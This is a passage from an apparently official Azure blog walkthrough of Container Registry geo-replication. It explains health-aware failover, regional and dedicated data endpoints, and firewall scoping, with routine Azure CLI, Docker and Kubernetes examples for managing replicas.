&lt;LI&gt;&lt;STRONG&gt;Health-aware failover is automatic.&lt;/STRONG&gt; When the registry in a region degrades, the global endpoint reroutes away from it on the order of minutes, evaluated per-registry. No customer action required.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Failback is automatic too.&lt;/STRONG&gt; Once health-aware failover marks a region healthy again, the global endpoint resumes routing to it. There is no cooldown period.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Health-aware failover applies only to global endpoint operations.&lt;/STRONG&gt; It does not apply to regional endpoints (you're talking to one replica, period) or to dedicated data endpoints (the redirect is per-region).&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Health-aware failover is not triggered by throttling.&lt;/STRONG&gt; It responds to regional ACR service health and Azure infrastructure health, not HTTP 429 responses. Use regional endpoints to manage per-replica throttling.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional endpoints (Step 2a) give you explicit per-region URLs&lt;/STRONG&gt; for workloads that need affinity, capacity planning, push/pull consistency, troubleshooting, or client-side failover. Use &lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;. Regional endpoints are available on &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-skus" target="_blank" rel="noopener"&gt;Premium SKU&lt;/A&gt; registries.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;For workloads that don't need pinning, do nothing (Step 2b).&lt;/STRONG&gt; The global endpoint plus health-aware failover handles routing automatically.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Re-authenticate when switching endpoints.&lt;/STRONG&gt; Each global or regional endpoint is its own authenticated surface; re-auth via &lt;CODE&gt;az acr login&lt;/CODE&gt;, SDK auth, or the Kubernetes ACR credential provider on endpoint change.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Don't run a long-lived DNS cache for the global endpoint.&lt;/STRONG&gt; ACR purges DNS server-side on disable and during failover; a long-lived client cache works against that.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;For production workloads, enable dedicated data endpoints&lt;/STRONG&gt; for security and DNS predictability on layer downloads.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;ACR is working on bounded staleness consistency&lt;/STRONG&gt; for cross-replica eventual-consistency failure modes; see the FAQ.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 id="background"&gt;Background&lt;/H2&gt;
&lt;H3 id="what-is-acr-geo-replication-"&gt;What is ACR geo-replication?&lt;/H3&gt;
&lt;P&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;Geo-replication&lt;/A&gt; is a &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-skus" target="_blank" rel="noopener"&gt;Premium SKU&lt;/A&gt; feature that turns a single ACR registry into a &lt;STRONG&gt;multi-region, multi-write&lt;/STRONG&gt; service. Every geo-replica in every region is writable — &lt;STRONG&gt;you can push, pull, and delete from any of them&lt;/STRONG&gt; — and &lt;STRONG&gt;content syncs asynchronously between replicas under an eventual consistency&lt;/STRONG&gt; &lt;STRONG&gt;model&lt;/STRONG&gt;. &lt;EM&gt;Per-push replication time scales with the size and number of images being pushed&lt;/EM&gt;. Similarly, &lt;EM&gt;when creating a new geo-replica, the time to populate the new geo-replica scales with the total size of the registry&lt;/EM&gt;.&lt;/P&gt;
&lt;P&gt;A geo-replicated registry exposes a &lt;STRONG&gt;global endpoint&lt;/STRONG&gt; at &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;. Behind that endpoint, ACR uses an internal traffic manager to direct each request to the replica with the best network performance profile for the caller. That is usually the closest replica, but not always: when clients are equidistant from multiple replicas, or when the closest replica is experiencing Azure infrastructure degradation, requests may be routed elsewhere. A geo-replicated registry also exposes a&amp;nbsp;&lt;STRONG&gt;regional endpoint&lt;/STRONG&gt; at &lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;, which lets clients pin API requests to a specific geo-replica instead of relying on the global endpoint's Azure-managed routing among geo-replicas.&lt;/P&gt;
&lt;P&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/container-registry/zone-redundancy" target="_blank" rel="noopener"&gt;Zone redundancy&lt;/A&gt; is always enabled for geo-replicas in regions where Azure has multiple availability zones — in those regions, ACR automatically spreads replica data across multiple availability zones within each region to protect against zonal outages.&lt;/P&gt;
&lt;H3 id="endpoints-and-data-endpoints-what-goes-where"&gt;Endpoints and data endpoints: what goes where&lt;/H3&gt;
&lt;P&gt;A common point of confusion: when you push or pull, not every request goes to the same place. The registry endpoints (global endpoint and regional endpoints), as well as the data endpoint, do different jobs. Your choice of data endpoint configuration has real consequences for security and resilience.&lt;/P&gt;
&lt;P&gt;Two kinds of traffic flow during a typical pull:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Registry API traffic&lt;/STRONG&gt;: authentication, manifest reads/writes, tag resolution, referrers, repository operations, blob location lookups, listing, and metadata. This is everything except the actual layer (blob) bytes. All of these API requests go to the &lt;STRONG&gt;global endpoint&lt;/STRONG&gt; (&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;) or, if you've pinned your clients to a specific geo-replica, to that geo-replica's &lt;STRONG&gt;regional endpoint&lt;/STRONG&gt; (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;). Behind the scenes, the global endpoint proxies these requests to a specific geo-replica.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Layer (blob) downloads&lt;/STRONG&gt;: when the client asks for a blob, the registry doesn't serve the bytes itself. It returns an HTTP 307 redirect to a &lt;STRONG&gt;regional &lt;U&gt;data&lt;/U&gt; endpoint (a separate endpoint from the global and regional endpoints)&lt;/STRONG&gt;, and the client follows the redirect to download the layer from that region.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Where that 307 sends you depends on &lt;STRONG&gt;whether you've enabled the registry's dedicated data endpoints feature&lt;/STRONG&gt;:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Configuration&lt;/th&gt;&lt;th&gt;Layer downloads redirect to&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Default (no dedicated data endpoints)&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;*.blob.core.windows.net&lt;/CODE&gt; (the underlying Azure storage account)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Dedicated data endpoints enabled&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt; for the region you were routed to&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Private endpoints enabled&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt; for the region you were routed to&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;STRONG&gt;Regional by design.&lt;/STRONG&gt; &lt;STRONG&gt;Dedicated data endpoints always land you on a specific geo-replica's data endpoint — there is no "global data endpoint."&lt;/STRONG&gt; With the global endpoint as your registry endpoint, the 307 redirect picks the data endpoint for whichever region the global endpoint chose to serve you. With a regional endpoint pinned to a specific region, the 307 always redirects you to that&amp;nbsp;&lt;STRONG&gt;same region's&lt;/STRONG&gt; data endpoint — never cross-region.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Why dedicated data endpoints matter.&lt;/STRONG&gt; &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-dedicated-data-endpoints" target="_blank" rel="noopener"&gt;Dedicated data endpoints&lt;/A&gt; are a Premium SKU feature that exists primarily to address security and firewall scoping. By default, layer downloads redirect to &lt;CODE&gt;*.blob.core.windows.net&lt;/CODE&gt; — a wildcard storage FQDN. Firewall rules to allow that wildcard either let &lt;EM&gt;all&lt;/EM&gt; Azure storage accounts through or none of them, which raises data exfiltration concerns and isn't tightly scoped to your registry. &lt;STRONG&gt;Dedicated data endpoints replace the wildcard with a fully qualified domain in your registry's own domain — &lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt;&lt;/STRONG&gt; — so firewall rules can be scoped tightly to your specific registry, in your specific regions.&lt;/P&gt;
&lt;P&gt;That same design choice can also make layer downloads more predictable during routing changes. &lt;STRONG&gt;With dedicated data endpoints, the data endpoint FQDN is known ahead of time and lives in the registry's domain&lt;/STRONG&gt; — one predictable hostname per region, configured once. Without them, the layer download has to resolve a wildcard storage FQDN that points to whichever storage account the registry happens to have provisioned, which is a separate DNS resolution path with its own routing behavior and its own caching profile. Dedicated data endpoints simplify the DNS picture by aligning the data path with the registry path and keeping the entire pull experience inside one set of predictable, scoped FQDNs.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;For any geo-replicated registry where security and high availability matter, enable dedicated data endpoints.&lt;/STRONG&gt;&lt;/P&gt;
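&lt;P&gt;As a minimal sketch, dedicated data endpoints can be turned on and then inspected with the Azure CLI. The registry name &lt;CODE&gt;myregistry&lt;/CODE&gt; is a placeholder, and the commands assume a Premium SKU registry and a logged-in CLI session.&lt;/P&gt;
&lt;PRE class="language-bash"&gt;&lt;CODE&gt;# Enable dedicated data endpoints on the registry (Premium SKU only)
az acr update --name myregistry --data-endpoint-enabled

# List the registry's endpoints, including the per-region data endpoints
az acr show-endpoints --name myregistry
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;The hostnames returned by the second command are the ones to allow in client firewall rules. It is worth updating those rules before clients start depending on the new data endpoints.&lt;/P&gt;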
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; Health-aware failover applies only to operations against the global endpoint, not to regional endpoints or dedicated data endpoints. &lt;STRONG&gt;Health-aware failover directs traffic away from a geo-replica only when an Azure region is experiencing significant infrastructure degradation. At this stage, it does not redirect traffic to another geo-replica when a client's data plane API requests are throttled.&lt;/STRONG&gt; See the relevant section below for the full scope of when health-aware failover does and does not trigger.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H3 id="the-three-traffic-control-tools"&gt;The three traffic control tools&lt;/H3&gt;
&lt;P&gt;ACR geo-replication gives you three complementary tools for controlling where traffic lands. Each one solves a different class of problem, and customers most often run into trouble when they reach for the wrong one. We name them up front and use these names throughout the post:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Tool&lt;/th&gt;&lt;th&gt;Who controls it&lt;/th&gt;&lt;th&gt;What it does&lt;/th&gt;&lt;th&gt;Use cases&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Health-aware failover&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Platform (automatic)&lt;/td&gt;&lt;td&gt;Reroutes the global endpoint away from a region whose registry can't reliably serve requests&lt;/td&gt;&lt;td&gt;Regional incidents, automatic recovery&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Replica enable/disable for global routing&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Customer (manual)&lt;/td&gt;&lt;td&gt;Excludes a specific replica from global endpoint routing without deleting it; data continues syncing&lt;/td&gt;&lt;td&gt;DR rehearsals, planned maintenance, quarantining a replica without losing it&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Regional endpoints&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Customer (per request)&lt;/td&gt;&lt;td&gt;Dedicated per-region URLs (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;) that bypass the internal traffic manager entirely&lt;/td&gt;&lt;td&gt;Pinning AKS clusters to co-located replicas, push/pull consistency, capacity planning, troubleshooting, client-side failover&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;Health-aware failover and replica enable/disable both act on the &lt;STRONG&gt;global endpoint&lt;/STRONG&gt;. Regional endpoints are a separate URL surface that &lt;STRONG&gt;coexists&lt;/STRONG&gt; with the global endpoint — enabling them does not disable the global endpoint&amp;nbsp;&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;. You can use both simultaneously and choose per workload.&lt;/P&gt;
&lt;H3 id="the-behavior-in-question"&gt;The behavior in question&lt;/H3&gt;
&lt;P&gt;When the registry in one region experiences a real degradation, there are three possible answers to "what happens?":&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;(A)&lt;/STRONG&gt; Nothing automatic. The customer must manually disable the affected region's endpoint to stop traffic from being routed there.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;(B)&lt;/STRONG&gt; The system detects the regional front-door failure and reroutes within seconds.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;(C)&lt;/STRONG&gt; A per-registry health evaluation detects the degradation and reroutes the global endpoint within minutes, with no customer action. After the region recovers, routing resumes automatically.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The answer today is &lt;STRONG&gt;(C)&lt;/STRONG&gt;. Before health-aware failover, customers were stuck closer to &lt;STRONG&gt;(A)&lt;/STRONG&gt; — the system could see whether the regional reverse proxy responded, but not whether the registry could actually serve real pull and push traffic end to end. Health-aware failover closes that gap.&lt;/P&gt;
&lt;P&gt;We walk through all three tools in the next section, in order: setting up geo-replication, using regional endpoints to pin specific workloads, keeping the global endpoint for everything else, the manual replica disable mechanism, re-enabling participation in global routing, and what to expect when health-aware failover triggers.&lt;/P&gt;
&lt;H2 id="walkthrough"&gt;Walkthrough&lt;/H2&gt;
&lt;P&gt;The following steps assume an existing Premium SKU registry and a logged-in Azure CLI session. We use &lt;CODE&gt;myregistry&lt;/CODE&gt; as the registry name, &lt;CODE&gt;myrg&lt;/CODE&gt; as the resource group, and &lt;CODE&gt;eastus&lt;/CODE&gt; as the home region. Substitute your own registry name, resource group, and region for these values.&lt;/P&gt;
&lt;H3 id="prerequisites"&gt;Prerequisites&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;A Premium SKU ACR registry (geo-replication requires Premium)&lt;/LI&gt;
&lt;LI&gt;Azure CLI (&lt;CODE&gt;az&lt;/CODE&gt;) installed and logged in&lt;/LI&gt;
&lt;LI&gt;For regional endpoints (Step 2a): Azure CLI 2.86.0 or later. All regional endpoints commands (&lt;CODE&gt;--regional-endpoints&lt;/CODE&gt;, &lt;CODE&gt;az acr show-endpoints&lt;/CODE&gt;, &lt;CODE&gt;az acr login --endpoint&lt;/CODE&gt;) are available natively in Azure CLI 2.86.0+. If you previously installed the &lt;CODE&gt;acrregionalendpoint&lt;/CODE&gt; private preview CLI extension, uninstall it with &lt;CODE&gt;az extension remove --name acrregionalendpoint&lt;/CODE&gt; to prevent conflicts with the built-in CLI commands.&lt;/LI&gt;
&lt;/UL&gt;
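&lt;P&gt;One way to check these prerequisites from a shell is sketched below. The commands only read local CLI state and the active account; the extension name is the one mentioned in the prerequisite above.&lt;/P&gt;
&lt;PRE class="language-bash"&gt;&lt;CODE&gt;# Print the installed Azure CLI version (regional endpoints need 2.86.0 or later)
az version --query '"azure-cli"' --output tsv

# Check whether the private preview extension is still installed (prints nothing if absent)
az extension list --query "[?name=='acrregionalendpoint'].name" --output tsv

# Confirm the CLI is logged in and show the active subscription name
az account show --query name --output tsv
&lt;/CODE&gt;&lt;/PRE&gt;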
&lt;H3 id="step-1-add-a-west-us-replica-to-a-registry-that-lives-in-east-us"&gt;Step 1: Add a West US replica to a registry that lives in East US&lt;/H3&gt;
&lt;P&gt;Geo-replication requires the Premium SKU. The create call below fails on Basic or Standard.&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Confirm the registry is Premium
az acr show --name myregistry --resource-group myrg \
  --query sku.name --output tsv
# Premium

# Create a West US geo-replica
az acr replication create --registry myregistry --location westus

# Confirm both replicas are present
az acr replication list --registry myregistry --output table
"&gt;&lt;CODE&gt;# Confirm the registry is Premium
az acr show --name myregistry --resource-group myrg \
  --query sku.name --output tsv
# Premium

# Create a West US geo-replica
az acr replication create --registry myregistry --location westus

# Confirm both replicas are present
az acr replication list --registry myregistry --output table
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;PRE&gt;&lt;CODE&gt;NAME    LOCATION    PROVISIONING STATE    STATUS    REGION ENDPOINT ENABLED
------  ----------  --------------------  --------  -------------------------
eastus  eastus      Succeeded             online    True
westus  westus      Succeeded             online    True
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;Pushes and pulls continue working through the existing replica throughout initial sync. Because the registry is multi-region, multi-write, the existing replica keeps serving traffic while the new replica catches up in the background. Initial replica seeding time is a function of &lt;STRONG&gt;registry size&lt;/STRONG&gt; — the total number and cumulative size of images already in the registry that need to be replicated to the new replica — not the size of any single image.&lt;/P&gt;
&lt;H3 id="step-2a-pin-workloads-to-specific-regions-using-regional-endpoints"&gt;Step 2a: Pin workloads to specific regions using regional endpoints&lt;/H3&gt;
&lt;P&gt;Use regional endpoints when a workload needs explicit per-region control. The five common cases:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional affinity&lt;/STRONG&gt; — an AKS cluster in East US should pull from the East US replica, every time, without ever hopping to a more distant replica because of a network performance fluctuation.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Predictable routing&lt;/STRONG&gt; — workloads that need to know exactly which replica will serve them, for benchmarking, capacity planning, or in-region traffic SLAs.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Push/pull consistency&lt;/STRONG&gt; — pinning both ends of a publish-then-deploy flow to the same replica eliminates eventual-consistency races.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Troubleshooting&lt;/STRONG&gt; — reproducing an issue on a specific replica requires sending traffic to that specific replica.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Client-side failover&lt;/STRONG&gt; — customers with their own health checks and business rules want to implement failover on their own terms, on signals only they can see.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Enable regional endpoints on the registry:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr update -n myregistry -g myrg --regional-endpoints enabled
"&gt;&lt;CODE&gt;az acr update -n myregistry -g myrg --regional-endpoints enabled
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;When enabled, ACR automatically creates per-region login server URLs for &lt;STRONG&gt;every&lt;/STRONG&gt; existing geo-replica. No per-region configuration is needed.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; Regional endpoints can be enabled on any Premium SKU registry, even without geo-replication. A registry without geo-replication has a single geo-replica in the home region, which gets one regional endpoint URL. However, the feature is most useful when your registry has at least two geo-replicas, where you can pin different workloads to different replicas for routing control and capacity distribution.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;Push to a specific region using its regional endpoint:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Log in to the West US regional endpoint
az acr login --name myregistry --endpoint westus

# Tag and push using the regional endpoint URL
docker tag myapp:v1 myregistry.westus.geo.azurecr.io/myapp:v1
docker push myregistry.westus.geo.azurecr.io/myapp:v1
"&gt;&lt;CODE&gt;# Log in to the West US regional endpoint
az acr login --name myregistry --endpoint westus

# Tag and push using the regional endpoint URL
docker tag myapp:v1 myregistry.westus.geo.azurecr.io/myapp:v1
docker push myregistry.westus.geo.azurecr.io/myapp:v1
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;Pin AKS deployments to their co-located replica by using regional endpoint URLs in the deployment manifest. The example below shows two clusters in different regions; each cluster references the regional endpoint for its own region's replica (assuming replicas exist in both &lt;CODE&gt;eastus&lt;/CODE&gt; and &lt;CODE&gt;westeurope&lt;/CODE&gt;):&lt;/P&gt;
&lt;PRE class="language-yaml" tabindex="0" contenteditable="false" data-lia-code-value="# East US-based AKS cluster pulls from the East US replica
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-eastus
spec:
  template:
    spec:
      containers:
        - name: myapp
          image: myregistry.eastus.geo.azurecr.io/myapp:v1
---
# West Europe-based AKS cluster pulls from the West Europe replica
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-westeurope
spec:
  template:
    spec:
      containers:
        - name: myapp
          image: myregistry.westeurope.geo.azurecr.io/myapp:v1
"&gt;&lt;CODE&gt;# East US-based AKS cluster pulls from the East US replica
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-eastus
spec:
  template:
    spec:
      containers:
        - name: myapp
          image: myregistry.eastus.geo.azurecr.io/myapp:v1
---
# West Europe-based AKS cluster pulls from the West Europe replica
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-westeurope
spec:
  template:
    spec:
      containers:
        - name: myapp
          image: myregistry.westeurope.geo.azurecr.io/myapp:v1
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;This eliminates cross-region pulls when global routing would otherwise prefer a different replica for a given client, and it gives you a per-region traffic profile you can plan capacity against.&lt;/P&gt;
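&lt;P&gt;If you template manifests per cluster, the regional image reference can be derived from the cluster's region rather than hard-coded. The sketch below is a minimal illustration: &lt;CODE&gt;regional_image_ref&lt;/CODE&gt; is a hypothetical helper name, and it assumes only the &lt;CODE&gt;myregistry.REGION.geo.azurecr.io&lt;/CODE&gt; URL pattern shown above.&lt;/P&gt;

```shell
# Hypothetical helper: build an image reference that targets one replica.
# The URL pattern follows the regional endpoint format used in the manifests above.
regional_image_ref() {
  registry="$1"   # registry name, e.g. myregistry
  region="$2"     # replica region, e.g. eastus
  image="$3"      # repository and tag, e.g. myapp:v1
  printf '%s.%s.geo.azurecr.io/%s\n' "$registry" "$region" "$image"
}

# Example: print the reference each regional cluster would use.
for region in eastus westeurope; do
  regional_image_ref myregistry "$region" myapp:v1
done
```

&lt;P&gt;The output of the helper can be substituted into the &lt;CODE&gt;image&lt;/CODE&gt; field by whatever templating step your deployment pipeline already uses.&lt;/P&gt;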
&lt;H4 id="regional-endpoint-operational-tips"&gt;Regional endpoint operational tips&lt;/H4&gt;
&lt;P&gt;&lt;STRONG&gt;View all endpoints.&lt;/STRONG&gt; Use &lt;CODE&gt;az acr show-endpoints&lt;/CODE&gt; to see all endpoint URLs for your registry — global, regional (if enabled), and dedicated data endpoints (if enabled):&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr show-endpoints --name myregistry --resource-group myrg
"&gt;&lt;CODE&gt;az acr show-endpoints --name myregistry --resource-group myrg
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;&lt;STRONG&gt;Import from a specific geo-replica.&lt;/STRONG&gt; When importing images between registries, you can use a regional endpoint to import from a specific geo-replica of the source registry. This is useful when you want predictable network paths or need to import from a replica in a specific region:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr import \
  --name mydownstreamregistry \
  --source myupstreamregistry.westeurope.geo.azurecr.io/myapp:v1 \
  --image myapp:v1
"&gt;&lt;CODE&gt;az acr import \
  --name mydownstreamregistry \
  --source myupstreamregistry.westeurope.geo.azurecr.io/myapp:v1 \
  --image myapp:v1
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;&lt;STRONG&gt;Firewall rules for regional endpoints.&lt;/STRONG&gt; If you use firewall rules, allow access to the following endpoints for each geo-replica that clients connect to:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Endpoint&lt;/th&gt;&lt;th&gt;Purpose&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Regional endpoint for registry operations&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Global endpoint (if also used)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Layer downloads (if using private endpoints or dedicated data endpoints)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;*.blob.core.windows.net&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Layer downloads (if not using private endpoints or dedicated data endpoints)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;For the full list of endpoint types and FQDN patterns, see the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;ACR reference for various registry endpoints&lt;/A&gt;.&lt;/P&gt;
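&lt;P&gt;As a rough aid for building an allow list, the table above can be expanded into concrete FQDNs for the replicas your clients use. This is a sketch under stated assumptions: &lt;CODE&gt;acr_firewall_fqdns&lt;/CODE&gt; is a hypothetical helper, and it assumes dedicated data endpoints are enabled. If they are not, allow &lt;CODE&gt;*.blob.core.windows.net&lt;/CODE&gt; for layer downloads instead of the data FQDNs.&lt;/P&gt;

```shell
# Hypothetical helper: list the registry FQDNs to allow for a set of replicas.
# Assumes dedicated data endpoints are enabled (see the table above).
acr_firewall_fqdns() {
  registry="$1"
  shift
  # Global endpoint, needed only if clients also use it.
  printf '%s.azurecr.io\n' "$registry"
  for region in "$@"; do
    # Regional endpoint for registry operations.
    printf '%s.%s.geo.azurecr.io\n' "$registry" "$region"
    # Dedicated data endpoint for layer downloads.
    printf '%s.%s.data.azurecr.io\n' "$registry" "$region"
  done
}

acr_firewall_fqdns myregistry eastus westus
```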
&lt;P&gt;&lt;STRONG&gt;DNS-based routing without changing manifests.&lt;/STRONG&gt; If you don't want to maintain different deployment manifests per region, you can keep all manifests pointing to the global endpoint (&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;) and use software-defined networking or a regional traffic manager to resolve the global endpoint to the appropriate regional endpoint based on the region the traffic originates from. This achieves the same co-location goals as referencing regional endpoints directly (predictable routing and reduced latency) without embedding region-specific URLs in your deployment manifests.&lt;/P&gt;
&lt;H3 id="step-2b-keep-using-the-global-endpoint-for-everything-else"&gt;Step 2b: Keep using the global endpoint for everything else&lt;/H3&gt;
&lt;P&gt;For workloads that don't need explicit pinning, &lt;STRONG&gt;do nothing&lt;/STRONG&gt;. The global endpoint at &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt; continues to work exactly as before and, combined with health-aware failover, routes intelligently across replicas without any configuration. ACR picks the best replica for each client based on network performance and reroutes during regional incidents.&lt;/P&gt;
&lt;P&gt;Regional endpoints &lt;STRONG&gt;coexist&lt;/STRONG&gt; with the global endpoint — enabling them does not disable &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;. You can use both simultaneously and choose per workload, mixing pinned workloads (Step 2a) with workloads that ride the global endpoint (Step 2b) in the same registry.&lt;/P&gt;
&lt;H3 id="step-3-take-a-replica-out-of-global-endpoint-routing"&gt;Step 3: Take a replica out of global endpoint routing&lt;/H3&gt;
&lt;P&gt;Use this when you need to keep a replica alive but stop it from serving global-endpoint traffic — for DR rehearsals, planned maintenance, or troubleshooting an isolated replica.&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Exclude the West US replica from global endpoint routing
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing false
"&gt;&lt;CODE&gt;# Exclude the West US replica from global endpoint routing
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing false
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;Confirm the change:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr replication list --registry myregistry --output table
"&gt;&lt;CODE&gt;az acr replication list --registry myregistry --output table
&lt;/CODE&gt;&lt;/PRE&gt;
